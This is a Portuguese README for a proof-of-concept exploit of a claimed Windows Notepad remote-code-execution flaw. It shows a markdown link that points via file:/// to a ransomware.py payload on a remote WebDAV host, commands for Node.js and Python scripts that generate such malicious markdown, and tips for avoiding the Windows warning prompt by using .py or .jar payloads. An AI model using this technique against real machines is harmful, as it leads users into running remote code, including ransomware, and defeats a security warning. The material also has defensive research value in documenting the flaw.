
PoC para o "Windows Notepad RCE"
PoC da vulnerabilidade "Windows Notepad RCE".
A "vulnerabilidade" é simples. O mecanismo de markdown do Windows Notepad não se importa com protocolos de URL obscuros. Como analista de malware, li muitos relatórios sobre implantação de payloads baseados em WebDAV e SMB. A partir deste doc, pode-se abusar do protocolo file:/// e criar uma URL que aponta para um arquivo em um servidor WebDAV/SMB.
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
Criei dois scripts. Um em Node.js e o outro em Python. Ambos criam um arquivo markdown apontando para um payload WebDAV. Você pode usar os payloads de exemplo na pasta sample-payloads.
node poc.js <servidor-webdav> <porta> <caminho/do/payload/no/servidor>
python poc.py <servidor-webdav> <porta> <caminho/do/payload/no/servidor>
A saída (poc.md) aparecerá no diretório atual.
A maioria das extensões de arquivo de payload (por exemplo, .exe, .lnk, .vbs, ...) ainda acionará um aviso integrado, apesar de o aplicativo Notepad ser vulnerável. O aviso vem do próprio Windows. Pelo menos tudo o que testei que pode levar à execução de código em uma instalação OOB padrão mostra esse aviso obrigatório.

Se o dispositivo de destino tiver Python ou Java instalado, você pode usar um payload .py ou .jar para ignorar o pop-up de aviso.
Clicar no link agora mostra um novo pop-up de aviso.
Você pode encontrar a versão vulnerável do Windows Notepad no Uptodown. Lembre-se de verificar a assinatura digital do instalador e garantir que ela seja da Microsoft. Além disso, você deve testar este PoC apenas em uma VM.
Fiquem seguros e divirtam-se!